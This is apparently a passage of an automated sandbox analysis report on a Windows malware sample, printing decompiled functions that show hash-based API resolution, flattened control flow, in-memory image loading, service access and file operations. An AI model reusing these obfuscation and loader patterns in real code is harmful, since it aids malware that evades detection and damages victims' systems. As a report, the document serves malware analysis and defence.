								if(__eflags > 0) {
									L29:
									return 1;
								} else {
									__eflags = _t121 - _t124;
									if(_t121 < _t124) {
										goto L16;
									} else {
										goto L29;
									}
								}
							}
						} else {
							if(_t123 == 0x12f5064) {
								_t82 =  *0x31dec0;
								__eflags = _t82;
								if(_t82 == 0) {
									_t99 = E00313F00(0x9bab0b12);
									_t119 = 0x8b0c7279;
									_t82 = E00313E60(_t101, _t99, 0x8b0c7279, _t126);
									 *0x31dec0 = _t82;
								}
								 *_t82(_t122, 0,  &_v564, 0x28);
								asm("sbb esi, esi");
								_t85 =  *0x31de3c;
								_t123 = (_t123 & 0xf96a5287) + 0x13ef6fdf;
								__eflags = _t85;
								if(_t85 == 0) {
									_t98 = E00313F00(0x9bab0b12);
									_t119 = 0x20de7595;
									_t85 = E00313E60(_t101, _t98, 0x20de7595, _t126);
									 *0x31de3c = _t85;
								}
								 *_t85(_t122);
								goto L15;
							} else {
								if(_t123 == 0x4a20241) {
									_t123 = 0x33602029;
									continue;
								} else {
									if(_t123 != 0xd59c266) {
										goto L15;
									} else {
										_t93 =  *0x31e1d4;
										if(_t93 == 0) {
											_t97 = E00313F00(0x9bab0b12);
											_t119 = 0xa229df38;
											_t93 = E00313E60(_t101, _t97, 0xa229df38, _t126);
											 *0x31e1d4 = _t93;
										}
										 *_t93( &_v572);
										_t123 = 0x1aed34c4;
										continue;
									}
								}
							}
						}
						L30:
					}
					__eflags = _t123 - 0x33602029;
					if(_t123 == 0x33602029) {
						_t75 =  *0x31e3f4;
						__eflags = _t75;
						if(_t75 == 0) {
							_t100 = E00313F00(0x9bab0b12);
							_t119 = 0x7dc9b9bb;
							_t75 = E00313E60(_t101, _t100, 0x7dc9b9bb, _t126);
							 *0x31e3f4 = _t75;
						}
						 *_t75(0,  &_v524, 0x104);
						_t123 = 0x3ae77736;
						goto L1;
					} else {
						__eflags = _t123 - 0x3ae77736;
						if(_t123 != 0x3ae77736) {
							goto L15;
						} else {
							__eflags =  *0x31de04;
							if( *0x31de04 == 0) {
								_t95 = E00313F00(0x9bab0b12);
								_t119 = 0xb66d748a;
								 *0x31de04 = E00313E60(_t101, _t95, 0xb66d748a, _t126);
							}
							_t92 = CreateFileW( &_v524, _v584, _v592, 0, _v588, _v580, 0); // executed
							_t122 = _t92;
							__eflags = _t122 - 0xffffffff;
							if(_t122 == 0xffffffff) {
								break;
							} else {
								_t123 = 0x12f5064;
								goto L1;
							}
						}
					}
					goto L30;
					L15:
					__eflags = _t123 - 0x13ef6fdf;
				} while (_t123 != 0x13ef6fdf);
				L16:
				__eflags = 0;
				return 0;
				goto L30;
			}






























                                                                                0x00318400
                                                                                0x00318400
                                                                                0x00318406
                                                                                0x0031840e
                                                                                0x00318416
                                                                                0x0031841e
                                                                                0x00318426
                                                                                0x0031842b
                                                                                0x00318430
                                                                                0x00318438
                                                                                0x00318440
                                                                                0x00318445
                                                                                0x0031844a
                                                                                0x00318452
                                                                                0x0031845a
                                                                                0x00318462
                                                                                0x0031846a
                                                                                0x00318472
                                                                                0x0031847a
                                                                                0x00318482
                                                                                0x00318491
                                                                                0x00318496
                                                                                0x0031849a
                                                                                0x003184a2
                                                                                0x003184af
                                                                                0x003184b3
                                                                                0x003184bb
                                                                                0x003184c3
                                                                                0x003184cb
                                                                                0x003184cf
                                                                                0x003184d7
                                                                                0x003184df
                                                                                0x003184df
                                                                                0x003184e3
                                                                                0x003184e3
                                                                                0x003184e3
                                                                                0x003184e3
                                                                                0x003184e9
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x003184ef
                                                                                0x0031866e
                                                                                0x00318676
                                                                                0x00318696
                                                                                0x0031869a
                                                                                0x003186a2
                                                                                0x003186a6
                                                                                0x003186aa
                                                                                0x003186b2
                                                                                0x003186b4
                                                                                0x00000000
                                                                                0x003186ba
                                                                                0x003186ba
                                                                                0x003186c5
                                                                                0x003186d1
                                                                                0x003186bc
                                                                                0x003186bc
                                                                                0x003186be
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x003186be
                                                                                0x003186ba
                                                                                0x003184f5
                                                                                0x003184fb
                                                                                0x0031854a
                                                                                0x0031854f
                                                                                0x00318551
                                                                                0x00318558
                                                                                0x0031855d
                                                                                0x00318564
                                                                                0x00318569
                                                                                0x00318569
                                                                                0x00318578
                                                                                0x0031857c
                                                                                0x0031857e
                                                                                0x00318589
                                                                                0x0031858f
                                                                                0x00318591
                                                                                0x00318598
                                                                                0x0031859d
                                                                                0x003185a4
                                                                                0x003185a9
                                                                                0x003185a9
                                                                                0x003185af
                                                                                0x00000000
                                                                                0x003184fd
                                                                                0x00318503
                                                                                0x00318543
                                                                                0x00000000
                                                                                0x00318505
                                                                                0x0031850b
                                                                                0x00000000
                                                                                0x00318511
                                                                                0x00318511
                                                                                0x00318518
                                                                                0x0031851f
                                                                                0x00318524
                                                                                0x0031852b
                                                                                0x00318530
                                                                                0x00318530
                                                                                0x0031853a
                                                                                0x0031853c
                                                                                0x00000000
                                                                                0x0031853c
                                                                                0x0031850b
                                                                                0x00318503
                                                                                0x003184fb
                                                                                0x00000000
                                                                                0x003184ef
                                                                                0x003185c8
                                                                                0x003185ce
                                                                                0x00318630
                                                                                0x00318635
                                                                                0x00318637
                                                                                0x0031863e
                                                                                0x00318643
                                                                                0x0031864a
                                                                                0x0031864f
                                                                                0x0031864f
                                                                                0x00318660
                                                                                0x00318662
                                                                                0x00000000
                                                                                0x003185d0
                                                                                0x003185d0
                                                                                0x003185d6
                                                                                0x00000000
                                                                                0x003185d8
                                                                                0x003185de
                                                                                0x003185e0
                                                                                0x003185e7
                                                                                0x003185ec
                                                                                0x003185fa
                                                                                0x003185fa
                                                                                0x0031861d
                                                                                0x0031861f
                                                                                0x00318621
                                                                                0x00318624
                                                                                0x00000000
                                                                                0x00318626
                                                                                0x00318626
                                                                                0x00000000
                                                                                0x00318626
                                                                                0x00318624
                                                                                0x003185d6
                                                                                0x00000000
                                                                                0x003185b1
                                                                                0x003185b1
                                                                                0x003185b1
                                                                                0x003185bd
                                                                                0x003185bd
                                                                                0x003185c7
                                                                                0x00000000

                                                                                APIs
                                                                                • CreateFileW.KERNELBASE(?,?,?,00000000,?,?,00000000,?,3251FEFE), ref: 0031861D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000010.00000002.2321187425.0000000000311000.00000020.00000001.sdmp, Offset: 00310000, based on PE: true
                                                                                • Associated: 00000010.00000002.2321183753.0000000000310000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000010.00000002.2321193940.000000000031D000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000010.00000002.2321198666.000000000031F000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_16_2_310000_upnp.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateFile
                                                                                • String ID: ) `3$) `3$6w:$6w:$=
                                                                                • API String ID: 823142352-4124229693
                                                                                • Opcode ID: c6970e0e247168702d190819904531ca9ac9817d2d18a60c2f6cb888bc3e1ae6
                                                                                • Instruction ID: a1ab23bef26b29a1786a1c38070e5b4657f8dd23ccf464273e106803375ccdd8
                                                                                • Opcode Fuzzy Hash: c6970e0e247168702d190819904531ca9ac9817d2d18a60c2f6cb888bc3e1ae6
                                                                                • Instruction Fuzzy Hash: 4B61F771A083119FC71EDF68C84569FBBE6ABD8714F00881DF4998B290DB78DD858F86
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00300D60, Relevance: 9.1, APIs: 6, Instructions: 124memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 160 300d60-300dd5 call 300ed0 VirtualAlloc RtlMoveMemory 164 300ddb-300dde 160->164 165 300ebe-300ec4 160->165 164->165 166 300de4-300de6 164->166 166->165 167 300dec-300df0 166->167 167->165 169 300df6-300dfd 167->169 170 300e03-300e36 call 301140 RtlMoveMemory 169->170 171 300eaf-300ebb 169->171 170->165 175 300e3c-300e4a VirtualAlloc 170->175 176 300e89-300ea0 RtlFillMemory 175->176 177 300e4c-300e52 175->177 176->165 183 300ea2-300ea5 176->183 178 300e54-300e56 177->178 179 300e5a-300e68 177->179 178->179 179->165 181 300e6a-300e7d RtlMoveMemory 179->181 181->165 182 300e7f-300e83 181->182 182->165 184 300e85 182->184 183->165 185 300ea7-300ea9 183->185 184->176 185->170 185->171
                                                                                APIs
                                                                                  • Part of subcall function 00300FB0: RtlMoveMemory.NTDLL(00000000,?,00000040), ref: 00300F08
                                                                                  • Part of subcall function 00300FB0: RtlMoveMemory.NTDLL(00000000,?,000000F8), ref: 00300F3E
                                                                                  • Part of subcall function 00300FB0: RtlMoveMemory.NTDLL(00000000,00000000,000000F8), ref: 00300F7F
                                                                                • VirtualAlloc.KERNEL32(?,?,00000000,?,?), ref: 00300DB4
                                                                                • RtlMoveMemory.NTDLL(00000000,?,?), ref: 00300DC3
                                                                                  • Part of subcall function 00301140: lstrcpynW.KERNEL32(00000000,00000000,00000000,00000010,00300EFD,00000000), ref: 00301155
                                                                                • RtlMoveMemory.NTDLL(00000000,-00000018,00000028), ref: 00300E11
                                                                                • VirtualAlloc.KERNEL32(?,?,00000000,?,?), ref: 00300E3D
                                                                                • RtlMoveMemory.NTDLL(00000000,?,?), ref: 00300E6C
                                                                                • RtlFillMemory.KERNEL32(00000000,?,00000000), ref: 00300E98
                                                                                Memory Dump Source
                                                                                • Source File: 00000010.00000002.2321178664.0000000000300000.00000040.00000001.sdmp, Offset: 00300000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_16_2_300000_upnp.jbxd
                                                                                Similarity
                                                                                • API ID: Memory$Move$AllocVirtual$Filllstrcpyn
                                                                                • String ID:
                                                                                • API String ID: 3581289920-0
                                                                                • Opcode ID: 98a03950a6b87b5ad15d3b8fee512a0dc4eebefe5bb086351cc2e195eb997952
                                                                                • Instruction ID: 81b15532243e7d5af93c134dc51c46471ec7fff9577f0d77c332192bee0c8fc2
                                                                                • Opcode Fuzzy Hash: 98a03950a6b87b5ad15d3b8fee512a0dc4eebefe5bb086351cc2e195eb997952
                                                                                • Instruction Fuzzy Hash: 7231D472A063406BD719DB60CC64BAB73E9EBC8381F040D2CB589E7391D635E881C762
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00318E80, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 131serviceCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 186 318e80-318e98 187 318ea0-318ea5 186->187 188 318eab 187->188 189 318f7a-318f7f 187->189 190 318eb1-318eb6 188->190 191 318f3f-318f46 188->191 192 319011-319016 189->192 193 318f85-318f8a 189->193 196 31901b-319022 190->196 197 318ebc-318ec1 190->197 194 318f63-318f75 191->194 195 318f48-318f5e call 313f00 call 313e60 191->195 192->187 198 318f8c-318f91 193->198 199 318fce-318fd5 193->199 194->187 195->194 203 319024-31903a call 313f00 call 313e60 196->203 204 31903f 196->204 205 318ec3-318ec8 197->205 206 318efc-318f03 197->206 207 318f93-318fa3 198->207 208 318fbb-318fc0 198->208 201 318ff2-31900c OpenServiceW 199->201 202 318fd7-318fed call 313f00 call 313e60 199->202 201->187 202->201 203->204 221 319042-319049 204->221 205->208 209 318ece-318ed5 205->209 215 318f20-318f2f 206->215 216 318f05-318f1b call 313f00 call 313e60 206->216 210 318fa5-318fac 207->210 211 318fae-318fb6 207->211 208->187 212 318fc6-318fcd 208->212 219 318ef2-318efa 209->219 220 318ed7-318eed call 313f00 call 313e60 209->220 210->210 210->211 211->187 215->221 233 318f35-318f3a 215->233 216->215 219->187 220->219 233->187
                                                                                C-Code - Quality: 66%
                                                                                			E00318E80() {
				short* _v4;
				void* __ebx;
				void* __ecx;
				void* __ebp;
				void* _t4;
				void* _t6;
				intOrPtr* _t11;
				intOrPtr* _t15;
				intOrPtr* _t19;
				intOrPtr* _t22;
				void* _t25;
				void* _t42;
				short* _t43;
				intOrPtr _t44;
				short* _t45;
				void* _t46;
				void* _t47;

				_t25 = _v4;
				_t4 = 0x1779a150;
				_t46 = _v4;
				_t43 = _v4;
				_t42 = 0;
				goto L1;
				do {
					while(1) {
						L1:
						_t47 = _t4 - 0xebfcc22;
						if(_t47 <= 0) {
							break;
						}
						if(_t4 == 0x1779a150) {
							_t4 = 0x23287775;
							continue;
						} else {
							if(_t4 == 0x1e3d7119) {
								if( *0x31e270 == 0) {
									 *0x31e270 = E00313E60(_t25, E00313F00(0x26f5757c), 0x56e230f9, _t46);
								}
								_t6 = OpenServiceW(_t46, _t43, 0x10000); // executed
								_t25 = _t6;
								_t4 =  !=  ? 0xebfcc22 : 0xbf6010;
								continue;
							} else {
								if(_t4 != 0x23287775) {
									goto L22;
								} else {
									_t44 =  *0x31e54c; // 0x50e1e8
									_t45 = _t44 + 0x260;
									while( *_t45 != 0x5c) {
										_t45 = _t45 + 2;
									}
									_t43 = _t45 + 2;
									_t4 = 0x10ada17;
									continue;
								}
							}
						}
						L32:
					}
					if(_t47 == 0) {
						_t11 =  *0x31e4c8;
						if(_t11 == 0) {
							_t11 = E00313E60(_t25, E00313F00(0x26f5757c), 0xe9d3e51f, _t46);
							 *0x31e4c8 = _t11;
						}
						 *_t11(_t25);
						_t42 =  !=  ? 1 : _t42;
						_t4 = 0xd10de09;
						goto L1;
					} else {
						if(_t4 == 0xbf6010) {
							_t15 =  *0x31e18c;
							if(_t15 == 0) {
								_t15 = E00313E60(_t25, E00313F00(0x26f5757c), 0x268fe5f0, _t46);
								 *0x31e18c = _t15;
							}
							 *_t15(_t46);
							goto L31;
						} else {
							if(_t4 == 0x10ada17) {
								_t19 =  *0x31e310;
								if(_t19 == 0) {
									_t19 = E00313E60(_t25, E00313F00(0x26f5757c), 0x9ba7cd1, _t46);
									 *0x31e310 = _t19;
								}
								_t46 =  *_t19(0, 0, 0xf003f);
								if(_t46 == 0) {
									L31:
									return _t42;
								} else {
									_t4 = 0x1e3d7119;
									goto L1;
								}
							} else {
								if(_t4 != 0xd10de09) {
									goto L22;
								} else {
									_t22 =  *0x31e18c;
									if(_t22 == 0) {
										_t22 = E00313E60(_t25, E00313F00(0x26f5757c), 0x268fe5f0, _t46);
										 *0x31e18c = _t22;
									}
									 *_t22(_t25);
									_t4 = 0xbf6010;
									goto L1;
								}
							}
						}
					}
					goto L32;
					L22:
				} while (_t4 != 0x2dd4caa9);
				return _t42;
				goto L32;
			}




















                                                                                0x00318e82
                                                                                0x00318e86
                                                                                0x00318e8c
                                                                                0x00318e91
                                                                                0x00318e96
                                                                                0x00318e98
                                                                                0x00318ea0
                                                                                0x00318ea0
                                                                                0x00318ea0
                                                                                0x00318ea0
                                                                                0x00318ea5
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00318f7f
                                                                                0x00319011
                                                                                0x00000000
                                                                                0x00318f85
                                                                                0x00318f8a
                                                                                0x00318fd5
                                                                                0x00318fed
                                                                                0x00318fed
                                                                                0x00318ff9
                                                                                0x00318ffb
                                                                                0x00319009
                                                                                0x00000000
                                                                                0x00318f8c
                                                                                0x00318f91
                                                                                0x00000000
                                                                                0x00318f93
                                                                                0x00318f93
                                                                                0x00318f99
                                                                                0x00318fa3
                                                                                0x00318fa5
                                                                                0x00318fa8
                                                                                0x00318fae
                                                                                0x00318fb1
                                                                                0x00000000
                                                                                0x00318fb1
                                                                                0x00318f91
                                                                                0x00318f8a
                                                                                0x00000000
                                                                                0x00318f7f
                                                                                0x00318eab
                                                                                0x00318f3f
                                                                                0x00318f46
                                                                                0x00318f59
                                                                                0x00318f5e
                                                                                0x00318f5e
                                                                                0x00318f64
                                                                                0x00318f6d
                                                                                0x00318f70
                                                                                0x00000000
                                                                                0x00318eb1
                                                                                0x00318eb6
                                                                                0x0031901b
                                                                                0x00319022
                                                                                0x00319035
                                                                                0x0031903a
                                                                                0x0031903a
                                                                                0x00319040
                                                                                0x00000000
                                                                                0x00318ebc
                                                                                0x00318ec1
                                                                                0x00318efc
                                                                                0x00318f03
                                                                                0x00318f16
                                                                                0x00318f1b
                                                                                0x00318f1b
                                                                                0x00318f2b
                                                                                0x00318f2f
                                                                                0x00319042
                                                                                0x00319049
                                                                                0x00318f35
                                                                                0x00318f35
                                                                                0x00000000
                                                                                0x00318f35
                                                                                0x00318ec3
                                                                                0x00318ec8
                                                                                0x00000000
                                                                                0x00318ece
                                                                                0x00318ece
                                                                                0x00318ed5
                                                                                0x00318ee8
                                                                                0x00318eed
                                                                                0x00318eed
                                                                                0x00318ef3
                                                                                0x00318ef5
                                                                                0x00000000
                                                                                0x00318ef5
                                                                                0x00318ec8
                                                                                0x00318ec1
                                                                                0x00318eb6
                                                                                0x00000000
                                                                                0x00318fbb
                                                                                0x00318fbb
                                                                                0x00318fcd
                                                                                0x00000000

                                                                                APIs
                                                                                • OpenServiceW.ADVAPI32(3251FEFE,?,00010000,?,3251FEFE,?,186D334D,0050E1E8,00318782,?,3251FEFE,?), ref: 00318FF9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000010.00000002.2321187425.0000000000311000.00000020.00000001.sdmp, Offset: 00310000, based on PE: true
                                                                                • Associated: 00000010.00000002.2321183753.0000000000310000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000010.00000002.2321193940.000000000031D000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000010.00000002.2321198666.000000000031F000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_16_2_310000_upnp.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: OpenService
                                                                                • String ID: uw(#$uw(#$P
                                                                                • API String ID: 3098006287-2212750484
                                                                                • Opcode ID: f0604591b4e7bf1da15c3911c814b765bc53026577ffed7f510a2163c67f1e02
                                                                                • Instruction ID: e82d58e19191dba0edd8fc7f30b20afdcc5c333042596e48736ffd62e21af17d
                                                                                • Opcode Fuzzy Hash: f0604591b4e7bf1da15c3911c814b765bc53026577ffed7f510a2163c67f1e02
                                                                                • Instruction Fuzzy Hash: 35410632B042049BDB2E6BBDAC807FA36DBA79C750F214829F945CB741EE20CCC147A5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00313780, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 102COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 241 313780-313793 242 3137b0-3137c5 241->242 243 313795-3137ab call 313f00 call 313e60 241->243 247 3137e2-3137fa 242->247 248 3137c7-3137dd call 313f00 call 313e60 242->248 243->242 255 313817-313832 247->255 256 3137fc-313812 call 313f00 call 313e60 247->256 248->247 261 313834-31384a call 313f00 call 313e60 255->261 262 31384f-31385e 255->262 256->255 261->262 269 313860-313876 call 313f00 call 313e60 262->269 270 31387b-3138b4 262->270 269->270 275 3138d1-3138e2 SHFileOperationW 270->275 276 3138b6-3138cc call 313f00 call 313e60 270->276 276->275
                                                                                C-Code - Quality: 62%
                                                                                			E00313780(void* __ecx, void* __edx, void* __edi, void* __esi) {
				char _v520;
				char _v528;
				char _v536;
				char _v1040;
				char _v1056;
				short _v1072;
				char* _v1076;
				char* _v1080;
				intOrPtr _v1084;
				intOrPtr* _t12;
				intOrPtr* _t14;
				intOrPtr* _t16;
				intOrPtr* _t18;
				intOrPtr* _t20;
				signed int _t26;
				void* _t36;
				void* _t63;
				void* _t66;
				void* _t69;
				void* _t70;
				void* _t71;
				void* _t72;
				struct _SHFILEOPSTRUCTW* _t73;

				_t70 =  &_v1072;
				_t12 =  *0x31ddc0;
				_t66 = __ecx;
				_t63 = __edx;
				if(_t12 == 0) {
					_t12 = E00313E60(_t36, E00313F00(0xc6fbcd74), 0x7e0ae558, _t69);
					 *0x31ddc0 = _t12;
				}
				 *_t12( &_v1072, 0, 0x1e);
				_t14 =  *0x31ddc0;
				_t71 = _t70 + 0xc;
				if(_t14 == 0) {
					_t14 = E00313E60(_t36, E00313F00(0xc6fbcd74), 0x7e0ae558, _t69);
					 *0x31ddc0 = _t14;
				}
				 *_t14( &_v1040, 0, 0x208);
				_t16 =  *0x31ddc0;
				_t72 = _t71 + 0xc;
				if(_t16 == 0) {
					_t16 = E00313E60(_t36, E00313F00(0xc6fbcd74), 0x7e0ae558, _t69);
					 *0x31ddc0 = _t16;
				}
				 *_t16( &_v520, 0, 0x208);
				_t18 =  *0x31e298;
				_t73 = _t72 + 0xc;
				if(_t18 == 0) {
					_t18 = E00313E60(_t36, E00313F00(0x9bab0b12), 0xba782e65, _t69);
					 *0x31e298 = _t18;
				}
				 *_t18( &_v1040, _t66);
				_t20 =  *0x31e298;
				if(_t20 == 0) {
					_t20 = E00313E60(_t36, E00313F00(0x9bab0b12), 0xba782e65, _t69);
					 *0x31e298 = _t20;
				}
				 *_t20( &_v528, _t63);
				_v1084 = 1;
				_v1080 =  &_v1056;
				_v1076 =  &_v536;
				_v1072 = 0xe14;
				if( *0x31e30c == 0) {
					 *0x31e30c = E00313E60(_t36, E00313F00(0xd9518805), 0x262a6194, _t69);
				}
				_t26 = SHFileOperationW(_t73); // executed
				asm("sbb eax, eax");
				return  ~_t26 + 1;
			}


























                                                                                0x00313785
                                                                                0x00313780
                                                                                0x0031378c
                                                                                0x0031378f
                                                                                0x00313793
                                                                                0x003137a6
                                                                                0x003137ab
                                                                                0x003137ab
                                                                                0x003137b9
                                                                                0x003137bb
                                                                                0x003137c0
                                                                                0x003137c5
                                                                                0x003137d8
                                                                                0x003137dd
                                                                                0x003137dd
                                                                                0x003137ee
                                                                                0x003137f0
                                                                                0x003137f5
                                                                                0x003137fa
                                                                                0x0031380d
                                                                                0x00313812
                                                                                0x00313812
                                                                                0x00313826
                                                                                0x00313828
                                                                                0x0031382d
                                                                                0x00313832
                                                                                0x00313845
                                                                                0x0031384a
                                                                                0x0031384a
                                                                                0x00313855
                                                                                0x00313857
                                                                                0x0031385e
                                                                                0x00313871
                                                                                0x00313876
                                                                                0x00313876
                                                                                0x00313884
                                                                                0x0031388a
                                                                                0x00313892
                                                                                0x0031389d
                                                                                0x003138a6
                                                                                0x003138b4
                                                                                0x003138cc
                                                                                0x003138cc
                                                                                0x003138d5
                                                                                0x003138d9
                                                                                0x003138e2

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000010.00000002.2321187425.0000000000311000.00000020.00000001.sdmp, Offset: 00310000, based on PE: true
                                                                                • Associated: 00000010.00000002.2321183753.0000000000310000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000010.00000002.2321193940.000000000031D000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000010.00000002.2321198666.000000000031F000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_16_2_310000_upnp.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileOperation
                                                                                • String ID: X~$X~$X~
                                                                                • API String ID: 3080627654-3258893172
                                                                                • Opcode ID: bae7364c53f2281388ee736263917d343222524a42fe3cded2e2a6afaa21f166
                                                                                • Instruction ID: a4460b4b703d91023404b99e5f11371903cdbbc8dd221510fcad866d7c9fd116
                                                                                • Opcode Fuzzy Hash: bae7364c53f2281388ee736263917d343222524a42fe3cded2e2a6afaa21f166
                                                                                • Instruction Fuzzy Hash: 5431D0B17003514BD71EAB79EC117EB7BEAAF8D704F00892CF815CB281EA34DA468791
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 003180A0, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 219fileCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 283 3180a0-31815b 284 318163-318168 283->284 285 318170-318175 284->285 286 318338-31833d 285->286 287 31817b 285->287 288 31836f-318377 286->288 289 31833f-318344 286->289 290 318181-318186 287->290 291 318287-31829b call 3134c0 287->291 297 318397-3183bb CreateFileW 288->297 298 318379-318391 call 313f00 call 313e60 288->298 294 318365-31836a 289->294 295 318346-31834b 289->295 292 318252-318259 290->292 293 31818c-318191 290->293 316 3182bb-3182e3 291->316 317 31829d-3182b5 call 313f00 call 313e60 291->317 305 318276-318282 292->305 306 31825b-318271 call 313f00 call 313e60 292->306 299 3181e3-31821a 293->299 300 318193-318198 293->300 294->285 301 3183c7-3183ce 295->301 302 31834d-318352 295->302 307 3183bd-3183c2 297->307 308 3183ee-3183fa 297->308 298->297 313 318237-31824d 299->313 314 31821c-318232 call 313f00 call 313e60 299->314 300->302 312 31819e-3181e1 call 31b6e0 300->312 310 3183d0-3183e6 call 313f00 call 313e60 301->310 311 3183eb-3183ec CloseHandle 301->311 302->285 315 318358-318364 302->315 305->285 306->305 307->285 310->311 311->308 312->285 313->285 314->313 334 318300-31830b 316->334 335 3182e5-3182fb call 313f00 call 313e60 316->335 317->316 347 318328-318333 334->347 348 31830d-318323 call 313f00 call 313e60 334->348 335->334 347->284 348->347
                                                                                C-Code - Quality: 71%
                                                                                			E003180A0(signed int __edx) {
				short _v524;
				struct _SECURITY_ATTRIBUTES* _v532;
				intOrPtr _v536;
				intOrPtr _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				char _v564;
				intOrPtr _v568;
				char _v572;
				struct _SECURITY_ATTRIBUTES* _v576;
				intOrPtr _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				void* __ebx;
				void* __ebp;
				void* _t58;
				void* _t64;
				void* _t66;
				void* _t73;
				intOrPtr* _t78;
				intOrPtr* _t80;
				void* _t82;
				void* _t83;
				intOrPtr* _t86;
				void* _t88;
				intOrPtr _t89;
				intOrPtr* _t90;
				void* _t92;
				void* _t96;
				intOrPtr _t101;
				char _t105;
				signed int _t122;
				void* _t125;
				void* _t127;
				void* _t128;
				signed int* _t129;
				void* _t131;

				_t122 = __edx;
				_t129 =  &_v596;
				_v584 = 0x9318;
				_t58 = 0x343bfd89;
				_v584 = _v584 ^ 0xde90c338;
				_v584 = _v584 ^ 0xde905120;
				_v596 = 0x7d19;
				_v596 = _v596 << 9;
				_v596 = _v596 >> 0xe;
				_v596 = _v596 + 0xffff07e5;
				_v596 = _v596 | 0x8aea6eef;
				_v596 = _v596 + 0xd867;
				_v596 = _v596 + 0x9c41;
				_v596 = _v596 + 0x3de0;
				_v596 = _v596 + 0x218b;
				_v596 = _v596 ^ 0x00014403;
				_v592 = 0x2591;
				_t128 = _v584;
				_t96 = 0;
				_v592 = _v592 * 0x7d;
				_v592 = _v592 + 0x8d68;
				_v592 = _v592 + 0xffff8911;
				_v592 = _v592 * 0x6a;
				_v592 = _v592 + 0xffff93d5;
				_v592 = _v592 ^ 0x07a13cd2;
				_v588 = 0x789;
				_v588 = _v588 >> 1;
				_v588 = _v588 ^ 0xaee58af2;
				_v588 = _v588 ^ 0xaee58936;
				while(1) {
					L1:
					goto L2;
					do {
						while(1) {
							L2:
							_t131 = _t58 - 0xea5411f;
							if(_t131 > 0) {
								break;
							}
							if(_t131 == 0) {
								_t73 = E003134C0(0x31d970);
								_t122 =  *0x31e158;
								_t127 = _t73;
								if(_t122 == 0) {
									_t122 = E00313E60(_t96, E00313F00(0xc6fbcd74), 0xba71dd03, _t128);
									 *0x31e158 = _t122;
								}
								_t101 =  *0x31e54c; // 0x50e1e8
								_t50 = _t101 + 0x260; // 0x50e448
								_t51 = _t101 + 0x18; // 0x50e200
								 *_t122( &_v524, 0x104, _t127, _t51, _t50);
								_t78 =  *0x31e494;
								_t129 =  &(_t129[5]);
								if(_t78 == 0) {
									_t83 = E00313F00(0x9bab0b12);
									_t122 = 0x7facde30;
									_t78 = E00313E60(_t96, _t83, 0x7facde30, _t128);
									 *0x31e494 = _t78;
								}
								_t125 =  *_t78();
								_t80 =  *0x31df30;
								if(_t80 == 0) {
									_t82 = E00313F00(0x9bab0b12);
									_t122 = 0x5010a54d;
									_t80 = E00313E60(_t96, _t82, 0x5010a54d, _t128);
									 *0x31df30 = _t80;
								}
								 *_t80(_t125, 0, _t127);
								_t58 = 0x2c2d24c8;
								goto L1;
							} else {
								if(_t58 == 0x2f64d8b) {
									_t86 =  *0x31e1d4;
									if(_t86 == 0) {
										_t88 = E00313F00(0x9bab0b12);
										_t122 = 0xa229df38;
										_t86 = E00313E60(_t96, _t88, 0xa229df38, _t128);
										 *0x31e1d4 = _t86;
									}
									 *_t86( &_v572);
									_t58 = 0xc5e088d;
									continue;
								} else {
									if(_t58 == 0x6f65414) {
										_t89 = _v568;
										_t105 = _v572;
										_v560 = _t89;
										_v552 = _t89;
										_v544 = _t89;
										_v536 = _t89;
										_t90 =  *0x31dee4;
										_v564 = _t105;
										_v556 = _t105;
										_v548 = _t105;
										_v540 = _t105;
										_v532 = 0;
										if(_t90 == 0) {
											_t92 = E00313F00(0x9bab0b12);
											_t122 = 0x4bf45878;
											_t90 = E00313E60(_t96, _t92, 0x4bf45878, _t128);
											 *0x31dee4 = _t90;
										}
										 *_t90(_t128, 0,  &_v564, 0x28);
										_t58 = 0x3557bd8c;
										_t96 =  !=  ? 1 : _t96;
										continue;
									} else {
										if(_t58 != 0xc5e088d) {
											goto L24;
										} else {
											_v580 = 0xa8c00;
											_v576 = 0;
											_v596 = E0031B6E0(_v580, _v576, 0x989680, 0);
											_v592 = _t122;
											_v588 = _v588 - _v596;
											_t58 = 0xea5411f;
